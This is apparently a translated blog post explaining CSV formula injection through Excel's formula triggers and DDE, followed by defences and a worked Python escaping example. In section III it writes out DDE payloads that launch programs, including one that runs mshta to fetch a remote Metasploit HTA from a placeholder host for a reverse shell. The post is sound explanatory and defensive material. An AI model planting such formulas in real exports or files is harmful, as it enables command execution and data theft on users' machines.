A brief introduction to CSV file injection vulnerabilities


"In network security, all external input is untrusted." Yet CSV file injection is often overlooked, probably because our first impression is that a CSV file is just a plain text file, so it does not raise any alarm.

I. Vulnerability definition

An attacker constructs a CSV file containing malicious commands or functions; when a normal user opens that CSV file with Excel, the malicious command or function is executed, producing the attack.

II. Causes of the vulnerability

1. Special characters in CSV files: "+, -, @, ="

Try entering "=1+1" in a CSV cell: after pressing Enter, the cell's value becomes 2, which shows that the arithmetic was actually executed.


Besides the plus sign, "-", "@" and "=" are also interpreted as the start of a formula.

2. DDE (Dynamic Data Exchange)

DDE is an inter-process communication protocol on Windows, a mechanism for dynamically exchanging data. DDE communication involves two Windows applications: one acts as the server that provides information, the other as the client that obtains information from the server. DDE is supported by Microsoft Excel, LibreOffice and Apache OpenOffice; Excel, Word, RTF and Outlook can use this mechanism to update their contents from the results of an external application. So if we craft a CSV file containing a DDE formula, Excel will attempt to run the external application when the file is opened.

III. Vulnerability demo

1. OS command execution

By building a DDE formula into the CSV file, cmd can be invoked and operating system commands executed.

As shown below, enter `=1+cmd|'/c calc'!A0` in a cell. After pressing Enter, Excel pops up a dialog warning that another program (cmd) needs to be started; click Yes and the Windows Calculator window appears.

Metasploit can generate a payload, and the injection below can be used to execute that payload and obtain a reverse shell.

=1+cmd|'/c mshta.exe http://XXXXX:8080/Micropoor.hta '!A0

Therefore, by exploiting this vulnerability, commands such as adding users, launching arbitrary programs, modifying the registry and spawning a reverse shell can be executed on the user's operating system.

2. Redirecting to a phishing site

When the user clicks the link below, Internet Explorer opens the attacker-supplied phishing site, achieving the phishing goal.


3. Information disclosure

By injecting a hyperlink function into the CSV file, the contents of specified cells can be submitted to a specified URL when the user opens the file and clicks the link (the example below submits the contents of cells A2/A3).


IV. Scenarios in which the vulnerability occurs

When a website offers a CSV export feature and users can control the content of the CSV file, this kind of attack becomes possible.

For example, an attacker can inject malicious commands through the login input box or other query and write functions; when an administrator later exports the site logs in CSV format, the attack can take place.

V. Defenses

1. Ensure that cells do not begin with the special characters ("+", "-", "@", "=");

2. Filter the special characters ("+", "-", "@", "=") out of cell contents;

3. First escape the raw input (prefix every double quote with another double quote), then add a tab character and wrap the value in double quotes to prevent injection;

4. Do not allow export to CSV or Excel formats;

5. Before exporting to Excel format, set the cell format to text in code (this does not work for CSV).

Difficulties these defenses face:

1. Processing cell contents necessarily alters the original data; in scenarios where the exported data is later imported into another system for processing, this affects the business;

2. For large data volumes, filtering and escaping during export affects export performance.
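Defense #3 and the first difficulty, worked through in an added example (not code from the original post): an export routine that escapes each cell and neutralises formula-like values, then reads the result back to show that the leading tab has become part of the data. The four trigger characters, the sample log rows and the column names are taken from or constructed for this illustration.

```python
import csv
import io

# Leading characters that Excel / LibreOffice treat as the start of a formula
# (the four the post lists).
FORMULA_PREFIXES = ("+", "-", "@", "=")

def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    return bool(value) and value[0] in FORMULA_PREFIXES

def encode_cell(value: str, delimiter: str = ",") -> str:
    """Encode one cell following defence #3 from the post: double embedded
    quotes; if the cell starts with a formula trigger, prefix a tab and wrap
    it in double quotes so the spreadsheet shows it as text."""
    needs_quotes = any(ch in value for ch in (delimiter, '"', "\n", "\r"))
    prefix = ""
    if is_formula_like(value):
        prefix = "\t"
        needs_quotes = True
    if not needs_quotes:          # ordinary value: leave it untouched
        return value
    return '"' + prefix + value.replace('"', '""') + '"'

def export_csv(rows, delimiter=","):
    """Serialise rows (lists of strings) to CSV text with every cell neutralised."""
    return "".join(delimiter.join(encode_cell(c, delimiter) for c in row) + "\n"
                   for row in rows)

def read_back(text):
    """Parse exported text with the stdlib reader: what a downstream importer sees."""
    return list(csv.reader(io.StringIO(text)))

# Constructed sample: a site-log export where the attacker-controlled username
# field carries formula-looking input (the "=1+1" case from the post) and a
# legitimate negative number that the same rule also catches.
SAMPLE_ROWS = [
    ["timestamp", "username", "balance"],
    ["2020-03-01 10:00:00", "alice", "12"],
    ["2020-03-01 10:00:05", "=1+1", "0"],
    ["2020-03-01 10:00:09", 'Smith, "Bob"', "-5"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
    # The trade-off the post raises: the neutralised cell does not round-trip
    # verbatim, because the leading tab is now part of the data.
    print(repr(read_back(export_csv(SAMPLE_ROWS))[2][1]))  # '\t=1+1'
```

Note that "-5" is neutralised too: a rule keyed on the leading character cannot tell a negative number from a formula, which is exactly why the exported data changes shape for downstream importers.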


Origin www.cnblogs.com/Eleven-Liu/p/12397857.html